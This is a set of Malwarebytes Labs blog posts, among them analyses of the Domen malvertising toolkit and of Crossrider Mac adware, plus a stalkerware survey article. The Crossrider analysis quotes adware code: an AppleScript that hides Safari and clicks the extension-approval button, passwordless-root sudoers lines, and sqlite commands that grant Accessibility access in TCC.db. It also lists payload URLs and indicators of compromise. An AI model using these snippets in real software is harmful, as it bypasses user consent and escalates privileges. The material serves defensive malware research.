The post Child identity theft, part 1: On familiar fraud appeared first on Malwarebytes Labs.

Lock and Code S1Ep1: On RSA, the human element, and the week in security

Last week, we told you we were launching a fortnightly podcast, called Lock and Code. This week, we made good on our promise, with lots of headlines generated right here on Labs, as well as other security news around the web. In addition, we talk with Britta Glade, Director of Content and Curation for RSA Conference, about the theme for last week’s conference: “The Human Element,” plus which types of submissions do well and what types will almost always be rejected.

Tune in for all this and more on the premiere episode of the first season of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, on Google Play Music, plus whatever preferred podcast platform you use.

We cover our own research on:

Plus, other cybersecurity news:

  • All ears: Are your smart devices around the home accidentally tuning in to your conversations? (Source: Moniotrlab)
  • Think that group is private? Think again: Certain private WhatsApp group invites are being indexed in Google. (Source: Vice)
  • Another day, another breach: This time around, it’s Slickwraps who feel the burn via content posted to a Medium blog. (Source: The Verge)
  • Scammers go for gold: It’s Olympics time again, and that means scams are almost certainly on the way (Source: Tech Republic)
  • E-scooters vulnerable to attack? Researchers report their findings on how open to abuse these popular devices are. (Source: ITP.net)

Stay safe, everyone!

The post Lock and Code S1Ep1: On RSA, the human element, and the week in security appeared first on Malwarebytes Labs.

Domen toolkit gets back to work with new malvertising campaign

Last year, we documented a new social engineering toolkit we called “Domen” being used in the wild. Threat actors were using this kit to trick visitors into visiting compromised websites and installing malware under the guise of a browser update or missing font.

Despite being a robust toolkit, we only saw Domen in sporadic campaigns last year, often reusing the same infrastructure that had already been partially disrupted. However, we recently came across a new malvertising campaign with brand new infrastructure that shows Domen is still being used by threat actors.

Even though Domen shares similarities with other social engineering templates, it is unique in its own ways. The client-side JavaScript responsible for the fake updates is one of the most thorough and professional coding jobs we had ever seen.

Previously, we had observed Domen pushing the NetSupport RAT and Predator the thief using its own custom downloader. This time, we noticed a change where the threat actor seems to be experimenting with Smoke Loader, followed by several different payloads.

Domen: the origins

We published our original blog in September 2019, however Domen had been active for several months already. We confirmed this when we found an advertisement posted in a blackhat forum in April 2019 that promoted the toolkit as a way to install EXEs and APKs.

forumpost

A couple months after our blog, we observed Domen in another campaign—probably carried out by the same threat actor. However, unlike the former one that had been used on compromised websites, this time it was via a malvertising chain (celeritascdn[.]com) leading to a decoy adult site hosted at tendermeets[.]club (a copycat of ftvgirls[.]com).

tendermeets

The reason we believe the two campaigns are related is because the delivery vector for the payload uses the same technique, namely uploading malicious files to Bitbucket.

tendermeetstraffic

Between the end of November 2019 and most of February 2020, Domen fell fairly silent.

Latest Domen campaign

On February 19, we caught a new malvertising chain with new domains, this time using a VPN service as a lure.

vpntemplate

The threat actor had just created new infrastructure to host the fraudulent page (search-one[.]info), the download site (mix-world[.]best), and the backend panel (panel-admin[.]best).

searchonetraffic

The payload is this infection chain is Smoke Loader. In one instance, Smoke Loader distributed several secondary payloads, including the IntelRapid cryptominer, a Vidar stealer, and Buran ransomware.

diagram

This is an interesting payload combination that seems to be more common these days.

More social engineering schemes

Domen is a well-made toolkit that has been used to distribute a variety of payloads by using tried and tested social engineering tricks. While tracking its author (or distributor), we noticed other forum postings advertising the same sort of payload installs, but using different and creative themes.

templates

The concept is the same, namely, those bogus sites are tempting users to download software that happens to be malware.

Since the decline in browser exploits in recent years, threat actors have migrated toward other infection vectors. As far as web threats are concerned, social engineering remains highly effective.

Malwarebytes business and Malwarebytes for Windows Premium users are already protected against this distribution campaign and its accompanying payloads.

Indicators of Compromise

Domen toolkit

search-one[.]info
panel-admin[.]best
mix-world[.]best

Smoke Loader

1a91b2a3a252554842de875c89f6eee105bc419d7e32d3a5c9f0f9078780ab30
vuterfaste[.]ru

IntelRapid

46.166.129[.]235/forum/files/client.exe
33d5f80242b4006ce14bba56692e1936157e0216b93faac823c42cc3f9ab4ec1

Vidar

46.166.129[.]235/forum/files/mass.exe
76ce130d2447f71bea8ed902959fd7e0aeac86b55f9e44a327c1f1c1bd73ba3f
molothunsen[.]com

Buran/Zeppelin

semantrus.pw/upload/open.exe
0163bb148d4eb632d00d6d3080e07bba46f2f3549e8f95a8ca8951c10280694f

Vidar

cq08462.tmweb[.]ru/88.exe
628a9c97a55155f60d3b5ae29bc64f1dca5a6baf2b4f6a1a1de5e836cd4fb73f
desperate[.]website

The post Domen toolkit gets back to work with new malvertising campaign appeared first on Malwarebytes Labs.

Mac adware is more sophisticated and dangerous than traditional Mac malware

As the data revealed in our State of Malware report showed, Mac threats are on the rise, but they are not the same type of threats experienced by Windows users. Most notably, more traditional forms of malware, such as ransomware, spyware, and backdoors account for over 27 percent of all Windows threats. That figure is less than 1 percent for Macs.

Further, Mac malware is rather unsophisticated overall. The remaining 99+ percent of Mac threats are “just” adware and potentially unwanted programs (PUPs). This has led some in the Mac community to dismiss these findings as unimportant, even leading one Mac blogger to write:

“Macs don’t get viruses” is a statement that is still overwhelmingly true.

However, adware and PUPs can actually be far more invasive and dangerous on the Mac than “real” malware. They can intercept and decrypt all network traffic, create hidden users with static passwords, make insecure changes to system settings, and generally dig their roots deep into the system so that it is incredibly challenging to eradicate completely.

To demonstrate our meaning, what follows is a detailed analysis of what may be the most sophisticated threat on macOS—called Crossrider—a threat that is “just adware.”

Mac adware installation

Crossrider, also known as Bundlore or SurfBuyer, is detected by Malwarebytes as Adware.Crossrider.

brands=(flashmall webshoppers webshoppy smartshoppy shoptool shoppytool coolshopper easyshopper liveshoppers smart-shoppy easy-shopper bestwebshoppers hotshoppy bestsmartshoppers myshopmate myshopbot surfmate surfbuyer couponizer shoppinizer shopperify mycouponize myshopcoupon mycouponsmart)

Whatever you call it, it’s been around for at least six or seven years, and has evolved fairly frequently during that time.

The first stage installer was found from analysis of a “weknow” uninstaller, which contained a link to a shell script. (The name “weknow” comes from one of many websites used by this adware.) This shell script, which kicks off the entire installation process, consists of around 300 lines of code—a fairly modest script that doesn’t take long to download.

Despite its relatively small size, the script opens a deep rabbit hole, downloading and executing a large number of other files. Since much of the code that gets executed is downloaded, the exact payload of the adware can be changed at a moment’s notice, and can vary depending on all manner of variables, such as where you’re located, whether your machine has been seen before, what else is installed, etc. Further, should any of the various delivery servers be hacked by a more malicious actor, those scripts could be used to deploy more malicious payloads.

Next, after conducting brief tracking data collection and uploading it to a server, Crossrider downloads a file from the following URL:

http://cdn.mycouponsmartmac.com/download/Mac/InstallerResources/pwr.zip

This file is expanded into an app named mm-install-macos.app. The sole purpose of this app is to phish the user’s password by displaying a fake authentication prompt. The password is returned to the script, in plain text, where it is used repeatedly to install the rest of the components.

password phishing dialog mac adware

The script next determines the version of the system and performs one set of actions on macOS 10.11 and higher, and another on older systems.

Installation on 10.11 and up

On newer systems, a compressed webtools.app is downloaded and executed using the phished password to run as root:

http://cdn.myshopcouponmac.com/download/Mac/InstallerResources/wt.zip

This app obscures the screen, during which time it installs a large number of files. As part of this process, it also makes a copy of Safari that is modified to automatically enable certain Safari extensions when opened, without user actions required.

obscured screen during installation

Although these modifications to Safari break its code signature, which can be used to validate that an app has not been modified by someone other than its creator, macOS will still happily run it because of limitations on when these code signatures are actually checked.

After this process completes, the copy of Safari is deleted, leaving the real copy of Safari thinking that it’s got a couple additional browser extensions installed and enabled.

Installation on 10.10 and older

On older systems, Crossrider downloads the following file:

http://dl.searchmine.net/download/Mac/InstallerResources/unified/SearchMine/imsearch.tar.gz

This is extracted, and an install.sh script it contains is executed. This script alone has over 900 lines of code, and it runs a number of other scripts and processes to make changes to Safari and Chrome settings and install browser extensions.

In the case of Safari, part of the process involves an AppleScript that enables an accessibility setting that provides keyboard access to all controls—and then uses that access to click the “Allow” button in the window Safari displays when the user tries to install a Safari extension.

tell application "Safari" to set bounds of windows to {0, 0, -1000, -1000}
 tell application "System Events"
     set visible of process "Safari" to false
     tell application process "Safari"
         set frontmost to true
         log "Clicking button 1 of sheet 1"
         tell window 1 to tell sheet 1 to click button 1
         delay 1
     end tell
 end tell

The script sneakily moves the window offscreen, so the user doesn’t see any of this happen during the installation process. All the user might see is that Safari briefly opens and then closes.

Next, a native Mac binary (like an app, but meant to be executed from the command line rather than through the Finder) is downloaded:

http://service.macinstallerinfo.com/Mac/getInstallScript/scripts/bin/iwt.bin

Among other files, this process, when executed, will install a component into the Applications folder, and then run a nearly 750 line shell script to make further browser changes.

Tracking data

Throughout the installation process, the various scripts and processes will repeatedly report data back to a variety of tracking servers. These transactions send potentially sensitive data, such as:

  • a unique identifier for the computer
  • IP address
  • the user name
  • macOS version
  • Safari version
  • Chrome version
  • a list of everything found in the Applications folder
  • a list of all installed agents and daemons
  • a list of all installed system configuration profiles
  • the version of the Malware Removal Tool, a security component of macOS designed to remove certain known pieces of malware

Since much of this data is obtained through scripts and processes that are downloaded from more than one server, the exact data being collected and where it’s being sent can be changed dynamically.

Changes to the system

There are a number of changes made throughout the system, some of them dangerous and difficult to remove for the average person. This makes Crossrider one of the most invasive threats I’ve ever seen on macOS.

System configuration profiles

These profiles are typically used by an IT admin to manage computers, often remotely. However, profiles can also be installed manually, via a .mobileconfig file, and the adware does exactly that.

payload templat mobile config file

The profile that is installed locks the home page and search engine settings in both Safari and Chrome, preventing them from being changed by the user until the profiles are removed.

Managed preferences

A managed preference is another method for changing settings that is managed by an IT admin. On older systems, the adware installs managed preference files that set Chrome’s preferences to pages associated with the adware.

managed preferences content

Changes to the sudoers file

On Unix-based systems, like macOS, the user with the higest level of permissions is the root user. On such systems, the sudoers file is a file that identifies which users are allowed to have root-level access, and how they’re allowed to get it.

Crossrider adware makes changes to the sudoers file in multiple places. In one, lines are added to allow a couple of the installed processes to have root permissions when running on the current user’s account:

someuser ALL=NOPASSWD:SETENV: /Users/someuser/Applications/MyMacUpToDate/MyMacUpToDate
someuser ALL=NOPASSWD:SETENV: /Users/someuser/Applications/UpToDateMac/UpToDateMac

In some cases, the installation process hits a snag and fails to write these changes properly, which invalidates the sudoers file, interfering with the ability to get root permissions. This can affect software installation abd the ability to troubleshoot, and is difficult to fix. (In order to fix the sudoers file, you must have root access, which you can’t get because the sudoers file is broken—it’s a catch-22.)

In other parts of the installation process, the adware gives all processes running for the user unlimited access to root without a password. The scripts try to revert these changes, but may not always be successful (such as if the script or process crashes).

someuser ALL=(ALL) NOPASSWD:ALL

These changes could be hijacked by other malicious software. For example, if a piece of malware were to overwrite the MyMacUpToDate or UpToDateMac processes in the first example (which would not require special access), it could escalate to root to do more damage. In the latter example, any process would be able to elevate to root access unconditionally.

TCC.db

In several places, the installation process will attempt to modify the TCC.db database. This database identifies which permissions the user has given to different processes, such as whether an app can access your calendar, your contacts, your computer’s microphone, your webcam, or certain folders on your system.

This adware attempts to give itself and a wide swath of other processes one of the most powerful capabilities: Accessibility access. This permission allows these processes to control other processes, which can be used to capture sensitive data, among other things.

if [[ "${osxVer}" == *"10.11"* ]] || [[ "${osxVer}" == *"10.12"* ]]; then     /usr/bin/sqlite3 <<EOF
 .open '${TCCDB}'
 insert or replace into access values('kTCCServiceAccessibility','com.apple.Terminal',0,1,1,NULL,NULL);
 ...
 insert or replace into access values('kTCCServiceAccessibility','/bin/bash',1,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','/bin/sh',1,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','/usr/bin/sudo',1,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','${TMPDIR}/.tmpma/installOffers.sh',1,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','com.stubberify.mym',0,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','com.tostubornot.mym',0,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','com.trustedmac.service',0,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','com.autobots.transform',0,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','com.mm-install-macos.www',0,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','com.mm-installer-macos.www',0,1,1,NULL,NULL);
 .quit
 EOF
     fi

This only works on older systems, as the TCC.db file is read-only by anything other than the system on recent versions of macOS. However, on an older system, this can give powerful permissions that could be abused by future updates of the adware, or by malware attempting to escalate its access to user data.

Browser extensions

Several browser extensions are installed for either Safari or Chrome or both, depending on the version of the system and versions of Safari and Chrome. These extensions give the adware greater capability to control the behavior of the browser.

Ordinarily, addition of a browser extension requires the user to confirm, for the express purpose of preventing adware or malware from surreptitiously installing a browser extension. However, this adware uses a number of shady tricks—such as the modified copy of Safari mentioned previously—to get these extensions installed without the user needing to approve them or even being aware they’ve been installed.

Browser extensions can gather an intrusive level of information from the browser: essentially, any data that may be displayed on a website or entered into a form on a website. The latter can include sensitive data, such as usernames, passwords, and credit card numbers.

Launch agents and daemons

Launch agents and daemons provide one of the most common ways for processes to stay persistently running on macOS. Crossrider adware installs multiple agents or daemons, depending on which files are being installed. Fortunately, these are extremely easy to spot for someone knowledgeable—in fact, they’re one of the first things a tech might look for—and are relatively easy to remove.

Malware must be worse, right?

Fortunately (or unfortunately, depending on how you look at it), no. Contrast Crossrider adware with some nation-state malware, such as malware made by North Korea’s Lazarus group or the OceanLotus malware thought to be created by Vietnam. Such malware typically installs a single launch agent or daemon, easily spotted by any expert who looks at the machine. Crossrider’s installation process alone far exceeds these forms of malware in sophistication.

Mac malware tends not to be particularly sophisticated. Of course, this doesn’t mean it can’t be dangerous, but right now, it’s sitting at the malware kiddy table. Simply put: It’s not sophisticated because it doesn’t have to be. If you’re a Mac user infected with malware, there are probably not going to be any outward symptoms you’d notice.

In contrast, adware is highly noticeable, since it changes the behavior of your computer, most typically your web browser. For this reason, Mac adware has had to evolve well beyond Mac malware, and has become far sneakier and harder to get rid of.

What’s the takeaway?

Although many Mac experts like to dismiss adware as a non-issue, saying people only get infected when they do “stupid things,” most of the most massive data breaches and damaging ransomware attacks on Windows machines happen because of user negligence: leaving data exposed on the Internet, opening malicious links via phishing email, or failing to patch software in a timely manner.

Adware is a growing problem on the Mac—and on Windows and Android operating systems as well. It was the most prevalent threat across all regions globally, for both consumers and businesses. And we saw that some Mac adware was actually more prevalent than most Windows threats in 2019.

Worse, these adware infections are usually more severe than a malware infection, opening up potential security holes that could be taken advantage of by more malicious threats and proving arduous to get rid of. In addition, adware on the Mac also commonly intercepts and decrypts all network traffic, uses randomly-generated names for installed files, uses analysis avoidance techniques to prevent researchers from analyzing them, creates hidden users on the system with known passwords, and more.

All in all, if I had to choose between one or the other, I would willingly infect my own machine with most of the Mac malware out there before I would do the same with Mac adware. Mac malware often makes me laugh. Mac adware sometimes gives me chills.

IOCs

The following indicators of compromise are associated with this adware.

Domains

http://www.weknow.ac
http://*.searchmine.net
http://client.mm-bq.host
http://service.macinstallerinfo.com
http://*.macmymacupdater.com
http://*.mycouponsmartmac.com
http://*.myshopcouponmac.com
http://*.mycouponizemac.com
http://*.shopperifymac.com
http://*.shoppinizermac.com
http://*.couponizermac.com
http://*.surfbuyermac.com
http://*.surfmatemac.com
http://*.myshopbotmac.com
http://*.myshopmatemac.com
http://*.bestsmartshoppersmac.com

Files

searchmine.sh 441fa62645591b2aa1b853ebfa51fe5bb36e6464ad3a4ff58a0b8297bea851d9
mm-install-macos ee94315a1099a982a2b61878a64ee6fe9134e544cdcae565995948a8ca843e51
webtools 888a1f9dfadde892496a3214ceb2a5a62a3997381ba6dbcd4e741d033352fd31
imsearch.tar.gz e07c9e59f7621eead7300cfe264a2d24a7749d592d8a2b32c48125eadf293f08
install.sh 591919f7b5ced77431990e7e9f257ce049f1fb2f93e9cdcb19b5400060518031
iwt.bin 168d9c1a06ab3f633e6fc724834ad8a9f4dc3c71945a34342347ce0df042a361
gui_scripting.sh df402cf21e5f78e55050d7ee14c050869d477faaeb58ab841f5992a0638a4a9f
installSafariExtension 212a954a7b67e851063daa2acabe841e8e54a4c29ca4f1fc096a160f1764aa14
installSafariHpNt 18b449b7d25733557d305b8a8ae9b331e628ec892996a83a39cb74bf2a7eca9a
update_legacy_chrome.py    b5ac18d3ea66dfad4baf02efad1a2f27f8134a2cd0f3c1d78e44d49bed613064
updatePreferences.py 6180666302bbf8032801d0aec6df08fbd27349c9d628f3a3dd7295256bf751b6

Thanks to Aditya Raj Das for finding the sample and assisting with the analysis!

The post Mac adware is more sophisticated and dangerous than traditional Mac malware appeared first on Malwarebytes Labs.

Stalkerware and online stalking are accepted by Americans. Why?

Despite warnings from domestic abuse networks, privacy
rights advocates, and a committed faction of cybersecurity vendors, Americans may
be accepting and minimizing online stalking behaviors, including the use of
invasive apps that can pry into a user’s text messages, emails, photos, videos,
and phone logs.

The limited opposition to these at-times abusive behaviors
was revealed by a new
study conducted by NortonLifeLock
, consumer cyber safety vendor and founding
member of the Coalition Against
Stalkerware
, which Malwarebytes helped form last year.

The distressing survey revealed that nearly half of
individuals between the ages of 18 and 34 said they found online stalking to be
“harmless.” Further, the study revealed that 1 in 10 Americans admitted to
using digital monitoring apps—sometimes referred to as stalkerware—against
their ex or current romantic partners.

How did we get here?

Unfortunately, we cannot exact whether the NortonLifeLock
survey results represent a shift in attitudes or reflect a long-held acceptance
of surveillance culture online. While US government agencies have recorded
stalking statistics for decades, those same agencies either have not recorded
admissions of online stalking behavior and perceptions of its harms, or did not
respond to requests for such data.

However, domestic abuse advocates and researchers agreed
that several factors play a role in the public’s acceptance of this type of
behavior. Many romantic comedy films romanticize stalking, while increasingly
more consumer home devices have normalized private, digital surveillance.
Further, current mobile apps have turned the viewing of someone’s private life
into an otherwise harmless interaction.

More likely, though, is that the public has always failed to
recognize and respond to the actual harms of stalking, said Elaina Roberts,
technology safety legal manager with National Network to End Domestic Violence.

“This is an age-old crime and people’s perceptions of it, in
my opinion, haven’t changed all that much,” Roberts said.

The NortonLifeLock Online Creeping Survey

In conjunction with The Harris Poll, NortonLifeLock surveyed
more than 2,000 adults in the United States about “online creeping”—behavior
that includes consistent, stealthy tracking of someone online, which could also
veer into behavior that is more akin to cyber stalking.

Overall, the survey found that 46 percent of respondents
admitted to “stalking” an ex or current partner online “by checking in on them
without their knowledge or consent.”

The most common forms of online stalking included checking a
current or former partner’s phone—at 29 percent—and looking through a partner’s
search history on one of their devices without permission—at 21 percent. Disturbingly,
9 percent of respondents admitted to creating a fake social media profile to
check in on their partners, and 8 percent of respondents admitted to tracking a
partner’s physical activity through their phone or through a health-related
app.

Kevin Roundy, technical director for NortonLifeLock, warned
about these behaviors.

“Some of the behaviors identified in the NortonLifeLock
Online Creeping Survey may seem harmless, but there are serious implications
when this becomes a pattern of behavior and escalates, or when stalkerware and
creepware apps get in the hands of an abusive ex or partner,” Roundy said.

When asked why respondents engaged in these behaviors, the
top two answers revealed a lack of trust and an itching, potentially harmful level
of concern; 44 percent said “they didn’t trust [their partner] or suspected
they were up to no good,” while 38 percent said they were “just curious.”

The gender disparity in the results was clear. In seemingly
every category, men found it more acceptable to engage in these behaviors and
to have these behaviors enacted against them.

While 35 percent of respondents said “they don’t care if
they are being stalked online by a current or former partner as long as they
are not being stalked in person,” it was 43 percent of men who agreed with that
statement versus 27 percent of women. Further, 20 percent of men said they
tracked a current or former partner’s location, versus 13 percent of women. Men
also showed that they more readily accepted online stalking if one or both of
the partners in a relationship had cheated or were merely suspected of
cheating.

These results reflect broader statistics in America about
who is more often victimized by stalking.

According to a national report of about 13,000 interviews
conducted by the Centers for Disease Control and Prevention (CDC), an estimated
15.2 percent of women and an estimated 5.7 percent of men have been stalked in
their lifetime. Women who said they were stalked during their lifetimes stated
they were the target of a variety of behaviors, including being approached at
home or work (61.7 percent); receiving unwanted messages like texts and voice
mails (55.3 percent); and being watched, followed, or spied on with a
“listening device, camera, or GPS device” (49.7 percent).

When asked if the CDC records the rate of admission of
stalking behavior and perceptions to stalking behavior, a spokesperson said the
agency does not keep such statistics.

The Bureau of Justice Statistics, which also tracks stalking in America, did not respond to a request for similar data.

Despite the two agencies’ robust datasets on the threat of
stalking, the NortonLifeLock survey revealed a different perspective on similar
behavior—a potentially concerning coziness with it. Young Americans in
particular, the survey showed, found little threat in online stalking.

The survey said that 45 percent of those aged 18–34 found
online stalking to be “harmless.” The same age group most heavily engaged in
the behavior—65 percent said they have “checked in on a current or former
significant other.”

Domestic abuse advocates argue that those high statistics
reflect a society that fails to fully recognize the harms of stalking,
cyberstalking, and invasive behavior toward romantic partners. Further, the
language actually used in the survey might point to less nefarious
interpretations by young people.

The normalization and minimization of stalking

Despite the NortonLifeLock study revealing troubling
perceptions of online stalking behavior, Erica Olsen, director of Safety Net at
National Network to End Domestic Violence, said these perceptions existed long
before the advent of technology-enabled abuse. It’s been happening for decades,
Olsen said.

“I unfortunately think that stalking behaviors have always,
to some extent, been accepted and minimized.” Olsen said. “I think a lot of it
has to do with the romanticizingof some of the behaviors—specifically
following and spying.”

Olsen pointed to many romantic comedies that portray
stalking as endearing.

In The Graduate, Dustin Hoffman’s character follows
Katharine Ross’s character despite explicitly being told to drop contact, much
like John Cusack’s character in Say Anything ignores the wishes of his
ex-girlfriend played by Ione Skye. The 1954 film Seven Brides for Seven
Brothers
involves several men who kidnap a group of women, and no, it isn’t
a horror movie.

As The New Statesmen wrote:

“A group of brothers kidnap six attractive women by causing
a life-threatening avalanche that keeps them imprisoned all winter. The women
play pranks on the men in revenge, and, in a shocking case of Stockholm
syndrome, everyone has an all-round jolly time. They pair off and are all
married by summer.”

These types of films can impact audience perceptions of
intrusive and aggressive behavior, found Julia Lippman, a research fellow at
the Center for Political Studies-Institute for Social Research at the
University of Michigan.

According to Lippman’s paper, “I Did It Because I Never Stopped Loving You: The Effects of Media Portrayals of Persistent Pursuit on Beliefs About Stalking,” women who watched movies with positive portrayals of aggressive romantic pursual were more likely to accept those behaviors, as opposed to women who watched movies with scary or threatening depictions of those same types of behaviors.

In speaking to the online outlet Bustle, Lippman said:

“Positive media portrayals of stalking—like those where
the pursuer is rewarded by ‘getting the girl’— can lead people to see stalking
in a more positive light.”

Media portrayals aside, another factor could play a role in the public’s acceptance of online stalking that amounts to digital surveillance—the privatization of surveillance in our own neighborhoods. Millions of smart doorbells have crept into countless suburbs across America, capturing footage of package thieves, yes, but, more often, of neighbors, children, and animals engaged in harmless behavior.

According to a survey conducted by The Washington Post,
smart doorbell owners who understood the privacy risks of their devices said
the risks were not enough to deter them from ownership. As The Washington Post
wrote:

“[In] the unscientific survey, most people also replied that
they were fine with intimate new levels of surveillance—as long as they were
the ones who got to watch.”

Finally, the acceptance of “online stalking” by younger
generations could intersect with emerging ways of staying in touch with one
another, and with the language that young people—particularly teenagers—use.

Diana Freed, a PhD student at the Intimate Partner
Violence tech research lab
 led by Cornell Tech faculty, said that, in
her research, she has found that teenagers often use the term “stalking” in a
harmless way to check in on people online.

“It’s a very common term used with teens—‘Let’s stalk that
person on Instagram,’—but they’re not saying it with the intent to harm,” Freed
said.

(Full disclosure, when this Malwarebytes Labs writer
attended college, he frequently heard the words “Facebook stalk” used to
describe looking up a romantic crush, whether that meant viewing their photos
or trying to find their “Relationship Status.”)

Freed said many apps also provide an opportunity for
“wholesome” viewing of other people’s lives. With features like TikTok’s
constant video feed or Snapchat Stories and Instagram Stories—which give users
the ability to post phots and short videos for only 24 hours—users can view
another user’s daily activities, despite being physically separated. That type
of behavior does not have to be covert, Freed said, and can be done “with full
knowledge” between two people who are friends offline.

“The ability to follow people closely is made available to
us just by the features offered,” Freed said.

As to whether the presence of the technology
itself—including stalkerware-type apps—has somehow created more stalkers, no
expert interviewed for this piece saw a provable correlation.

Roberts of NNEDV said that even before the proliferation of
GPS devices and stalkerware, domestic abusers would excuse their persistent,
physical following of their partners by saying they were merely concerned for
their partner’s safety. Today, she said, abusers use the same lies—urging survivors
to use GPS location apps or stalkerware as a way to ensure safety.

“So, while we can potentially say that people are just more
inclined to be accepting of this behavior today,” Roberts said, “I believe the
truth is that people have always minimized these types of ‘caring’
behaviors as they appear to be done out of concern.”

Moving forward

All of this presents two concerning realities—Americans are
growing warm to online stalking; Americans have always accepted stalking. Neither
is the type of reality that should go unopposed.

Remember, online stalking that violates a person’s privacy is not harmless. Many of the behaviors described in the survey are the same types of behaviors that domestic abuse survivors face every day, from using stalkerware to learn private information, to tracking a person’s GPS location as a means to find them to inflict violence.

For years, Malwarebytes has worked to detect and raise
awareness about invasive monitoring apps that can pry into users’ lives without
their consent
. This latest survey only proves that more work is needed.
We’re ready for it.

The post Stalkerware and online stalking are accepted by Americans. Why? appeared first on Malwarebytes Labs.